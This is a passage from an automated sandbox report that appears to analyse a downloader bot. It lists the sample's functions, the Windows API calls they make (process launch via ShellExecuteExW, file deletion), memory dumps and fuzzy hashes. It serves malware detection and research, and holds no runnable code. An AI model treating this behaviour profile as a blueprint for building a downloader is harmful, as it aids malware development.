                                                  • Part of subcall function 00007FF658E239A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E239B3
                                                  • Part of subcall function 00007FF658E21AB0: type_info::_name_internal_method.LIBCMTD ref: 00007FF658E21B0A
                                                  • Part of subcall function 00007FF658E21AB0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E21CC8
                                                  • Part of subcall function 00007FF658E21AB0: ShellExecuteExW.SHELL32 ref: 00007FF658E21CFD
                                                  • Part of subcall function 00007FF658E21AB0: WaitForSingleObject.KERNEL32 ref: 00007FF658E21D1C
                                                  • Part of subcall function 00007FF658E21AB0: GetExitCodeProcess.KERNEL32 ref: 00007FF658E21D2F
                                                  • Part of subcall function 00007FF658E21AB0: CloseHandle.KERNEL32 ref: 00007FF658E21D3D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Concurrency::details::EmptyQueue::StructuredWork$CloseCodeExecuteExitHandleObjectProcessShellSingleWaitshared_ptrtype_info::_name_internal_method
                                                • String ID: " -C "
                                                • API String ID: 4074718890-1510411174
                                                • Opcode ID: e3e65493c5c93f8778879d6a5c36af1fba031270d7209929f3d3be2bd247b050
                                                • Instruction ID: 5fb335c0b3f034330c32fce12cb065107d1a0c05bdc73160f6beeb79c04caa45
                                                • Opcode Fuzzy Hash: e3e65493c5c93f8778879d6a5c36af1fba031270d7209929f3d3be2bd247b050
                                                • Instruction Fuzzy Hash: 2E51E732609AC291E660DB65F8512EBB3B0FBC4780F444132E68E97B69EF3CE545CB44
                                                Function 00007FF658E22160 Relevance: 3.0, APIs: 2, Instructions: 50fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00007FF658E239A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E239B3
                                                  • Part of subcall function 00007FF658E21EA0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E21ECC
                                                  • Part of subcall function 00007FF658E21EA0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,00007FF658E213D0), ref: 00007FF658E21ED4
                                                  • Part of subcall function 00007FF658E2AC70: _Func_class.LIBCONCRTD ref: 00007FF658E2ACA3
                                                • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E221CB
                                                • DeleteFileW.KERNEL32 ref: 00007FF658E221D3
                                                  • Part of subcall function 00007FF658E24EF0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E24F0B
                                                  • Part of subcall function 00007FF658E24EC0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E24EDB
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Concurrency::details::EmptyQueue::StructuredWork$File$DeleteExistsFunc_classPath
                                                • String ID:
                                                • API String ID: 1167149137-0
                                                • Opcode ID: 79ad5cdaee4071a0cad61ef7f1825c95ea4057d6b39a588d18dca4a3cd80d58a
                                                • Instruction ID: fd5bfc2478f5cf55fb02eeb179d2964fd4018dbbb3aac2c253fcbae254bf4a5f
                                                • Opcode Fuzzy Hash: 79ad5cdaee4071a0cad61ef7f1825c95ea4057d6b39a588d18dca4a3cd80d58a
                                                • Instruction Fuzzy Hash: 5321EE32A1C69685E660EB21E85136BA371FBC5744F440131E68EA7E9ADF3CE504CB04
                                                Function 00007FF658E21EA0 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00007FF658E2AC70: _Func_class.LIBCONCRTD ref: 00007FF658E2ACA3
                                                • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E21ECC
                                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,00007FF658E213D0), ref: 00007FF658E21ED4
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Concurrency::details::EmptyExistsFileFunc_classPathQueue::StructuredWork
                                                • String ID:
                                                • API String ID: 751013954-0
                                                • Opcode ID: 7fdefa42ffe60eb363dab5a25b184e42fb5ef18f0cb8c92bda0a5a5edec4f82c
                                                • Instruction ID: fda232e97a5567a24842bab169328c61db7fe30d8c2c3529a49e02da5681d6a7
                                                • Opcode Fuzzy Hash: 7fdefa42ffe60eb363dab5a25b184e42fb5ef18f0cb8c92bda0a5a5edec4f82c
                                                • Instruction Fuzzy Hash: C6018412A0C69680EA20E731EC5117F7B70EBC5784F480131E6CE96E96CE3CE2448F04
                                                Function 00007FF658E349A0 Relevance: 1.6, APIs: 1, Instructions: 133COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 616 7ff658e349a0-7ff658e349cb 617 7ff658e349e7 616->617 618 7ff658e349cd-7ff658e349d0 616->618 619 7ff658e349e9-7ff658e34a05 617->619 618->617 620 7ff658e349d2-7ff658e349d5 618->620 621 7ff658e34a06-7ff658e34a09 620->621 622 7ff658e349d7-7ff658e349e2 call 7ff658e35e24 call 7ff658e335fc 620->622 621->622 623 7ff658e34a0b-7ff658e34a17 621->623 622->617 623->622 626 7ff658e34a19-7ff658e34a22 623->626 628 7ff658e34a2a 626->628 629 7ff658e34a24-7ff658e34a28 626->629 630 7ff658e34a30-7ff658e34a3a 628->630 629->630 631 7ff658e34a3d 630->631 632 7ff658e34b42-7ff658e34b45 631->632 633 7ff658e34a43-7ff658e34a4d 631->633 632->619 634 7ff658e34a91-7ff658e34a97 633->634 635 7ff658e34a4f-7ff658e34a54 633->635 636 7ff658e34a99-7ff658e34a9e 634->636 637 7ff658e34b11-7ff658e34b19 call 7ff658e3e854 634->637 635->634 638 7ff658e34a56 635->638 640 7ff658e34aa0-7ff658e34aaa call 7ff658e33f60 636->640 641 7ff658e34ab1-7ff658e34ab7 636->641 645 7ff658e34b1e-7ff658e34b21 637->645 642 7ff658e34afc 638->642 643 7ff658e34a5c-7ff658e34a61 638->643 644 7ff658e34b01-7ff658e34b0c 640->644 657 7ff658e34aac 640->657 647 7ff658e34ab9-7ff658e34ac1 641->647 648 7ff658e34ac4-7ff658e34ae0 call 7ff658e3d1d8 call 7ff658e3dce0 641->648 642->644 643->644 649 7ff658e34a67-7ff658e34a8c call 7ff658e2e4c0 643->649 644->619 645->644 651 7ff658e34b23-7ff658e34b32 645->651 647->648 660 7ff658e34ae5-7ff658e34ae8 648->660 655 7ff658e34b37-7ff658e34b3d 649->655 651->655 656 7ff658e34b34 651->656 655->631 656->655 657->641 660->642 661 7ff658e34aea-7ff658e34afa 660->661 661->642 661->655
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: _invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 3215553584-0
                                                • Opcode ID: 4f883b95f7da27380a1c8dc92d1d8b1f3044823d872828230510567fc2dfe5a8
                                                • Instruction ID: 7aacfd3b9fd63494d1223bb072fa79b4838f2fcececf91f931f908acffbe1a52
                                                • Opcode Fuzzy Hash: 4f883b95f7da27380a1c8dc92d1d8b1f3044823d872828230510567fc2dfe5a8
                                                • Instruction Fuzzy Hash: 4541B161B0826646EA689936590023D72A1AF54FE8F1C4234DE6DE7FE9DE3CFC41870C
                                                Function 00007FF658E236B0 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00007FF658E236F4
                                                  • Part of subcall function 00007FF658E23680: DNameNode::DNameNode.LIBCMTD ref: 00007FF658E2368E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: NameProcessorVirtual$Concurrency::NodeNode::RootRoot::
                                                • String ID:
                                                • API String ID: 708125375-0
                                                • Opcode ID: c23f3cb0eba1474faa08fb5fd51b8bc61fb7488c62b3203690764f73a4b9d535
                                                • Instruction ID: cce1c3c226c7f9889530a3ee6684d611a038ead9856b20e76ac746d638b1ad92
                                                • Opcode Fuzzy Hash: c23f3cb0eba1474faa08fb5fd51b8bc61fb7488c62b3203690764f73a4b9d535
                                                • Instruction Fuzzy Hash: 6931EB72718B9582DB10DB29E49172EB7B0FBC6B84F504425EB8D93B29DF3DD8108B04
                                                Function 00007FF658E3DCE0 Relevance: 1.6, APIs: 1, Instructions: 67COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ae5b57370f23d51800a9b1807dfedf1ba41dfc8965c0f84bd68db13f37ff051e
                                                • Instruction ID: c114e200fc80bb0b4b92a04ee7a15641e6be6ff3a02c764641dc768f63b3f157
                                                • Opcode Fuzzy Hash: ae5b57370f23d51800a9b1807dfedf1ba41dfc8965c0f84bd68db13f37ff051e
                                                • Instruction Fuzzy Hash: C721B532F0826255E7016F36A84137C3670AF40BA1F594634E91DA7BE2CE7CFC418708
                                                Function 00007FF658E46CB8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: _invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 3215553584-0
                                                • Opcode ID: 242aa104a256ba5b2150a3216f3597a632c2a9ef4fcd88e67720f97e344cd703
                                                • Instruction ID: 9172be1a9112540e80c4531ef99f4906e08ff721d3e0a5551bf29dc72ad76baf
                                                • Opcode Fuzzy Hash: 242aa104a256ba5b2150a3216f3597a632c2a9ef4fcd88e67720f97e344cd703
                                                • Instruction Fuzzy Hash: F521953260865187EB619F29E44037976B0EBC5B94F284235E69DD7AF9DF3DD8048B04
                                                Function 00007FF658E38A14 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                • String ID:
                                                • API String ID: 3947729631-0
                                                • Opcode ID: a81a60bed567f56c1a5b8481f21f90bb2bad9351e94e3c75933ccff56822174f
                                                • Instruction ID: da218c11df0d42727b4280be3a08b887603062bce9d67eb20f3058cd15a20df3
                                                • Opcode Fuzzy Hash: a81a60bed567f56c1a5b8481f21f90bb2bad9351e94e3c75933ccff56822174f
                                                • Instruction Fuzzy Hash: 03218371E04B2189EB508F74C4412EC37F0EB44708F484535EA4DA2EA5EF39ED86CB84
                                                Function 00007FF658E35D64 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: _invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 3215553584-0
                                                • Opcode ID: c58a6de67e2055b790713986da8547549aa067ac248cc4a518fd06b724001c9a
                                                • Instruction ID: 4a9f55db749e0014d7541034fec4f94a2fa1885e95647387377ab8fd08c2185a
                                                • Opcode Fuzzy Hash: c58a6de67e2055b790713986da8547549aa067ac248cc4a518fd06b724001c9a
                                                • Instruction Fuzzy Hash: 47117221A0C6A651FA619B31E40137A96F0AF85B85F5C4430EA4DEBFA6DF3CFC028704
                                                Function 00007FF658E33C5C Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: _invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 3215553584-0
                                                • Opcode ID: 62244de87ae4b4113fbbc14a89a14e51f7e78cb0fd49ce4e2289867358183eba
                                                • Instruction ID: 6d7aa09179f514252ce5a327d44a28f211773120499ce1c23ed9342f65fbdede
                                                • Opcode Fuzzy Hash: 62244de87ae4b4113fbbc14a89a14e51f7e78cb0fd49ce4e2289867358183eba
                                                • Instruction Fuzzy Hash: 87018422B0C52751FD15AA79A41177911709F45B64F2C0330E92DFAAF2CE3CFC428318
                                                Function 00007FF658E34B4C Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: _invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 3215553584-0
                                                • Opcode ID: ecfd531bd65b0a5be3dfce5bc1872eabf1e7cdc80219654d23c0605bfb103cca
                                                • Instruction ID: 9b6d14bad7ba6760bfa792e97acdb7f543b0faa9695f80cf53700f4e38401903
                                                • Opcode Fuzzy Hash: ecfd531bd65b0a5be3dfce5bc1872eabf1e7cdc80219654d23c0605bfb103cca
                                                • Instruction Fuzzy Hash: C0015B72A00B6A98EB10DFB0E4414EC37B8FB24358B480535DE4C63B68DF34EAA5C384
                                                Function 00007FF658E33CE0 Relevance: 1.5, APIs: 1, Instructions: 30COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: _invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 3215553584-0
                                                • Opcode ID: 98756747894a6ecf2af4b58c7d9ad278c5ab213a1f66fbf54e86da30ee3cf387
                                                • Instruction ID: d5406a70c39c58ce37aa1e0fea053406d856851fe22c946f150e98609820a6d9
                                                • Opcode Fuzzy Hash: 98756747894a6ecf2af4b58c7d9ad278c5ab213a1f66fbf54e86da30ee3cf387
                                                • Instruction Fuzzy Hash: 56F05431A0C25252E914A77DB40197A66705F41750F6C5630F51DE6BE7DE7CFC418618
                                                Function 00007FF658E3F734 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • HeapAlloc.KERNEL32(?,?,?,00007FF658E41175,?,?,00000000,00007FF658E4334B,?,?,?,00007FF658E392FF,?,?,?,00007FF658E391F5), ref: 00007FF658E3F772
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: AllocHeap
                                                • String ID:
                                                • API String ID: 4292702814-0
                                                • Opcode ID: 11c605d5063ca8d017083a3c2561951eacea7d586e8e9881430da4d93f960e69
                                                • Instruction ID: 0f215900457f7e0f914584730313a8bac0a892a5d2ceabf6ed624bac727177ce
                                                • Opcode Fuzzy Hash: 11c605d5063ca8d017083a3c2561951eacea7d586e8e9881430da4d93f960e69
                                                • Instruction Fuzzy Hash: 96F08C10F2C62380FE646AB259022B512B04F847A2F0C0634DC3EE6BE1DE7CFC418218

                                                Non-executed Functions

                                                Function 00007FF658E2CBF4 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 169libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: AddressProc$HandleModule
                                                • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                • API String ID: 667068680-295688737
                                                • Opcode ID: c217c5e1ff87bbb2675932e08d25915ecaaaf280c79ce1606b093db371dcdcf8
                                                • Instruction ID: 7ebccccf62ae61ebcafcabe1c83902bf2466c20aa763c231d51cbdb10ba028a4
                                                • Opcode Fuzzy Hash: c217c5e1ff87bbb2675932e08d25915ecaaaf280c79ce1606b093db371dcdcf8
                                                • Instruction Fuzzy Hash: 4EA19064A09B2791FA01DFB6B85406423B0BBC9785F499031C9AFF3E30EE7DA158C358
                                                Function 00007FF658E456F0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
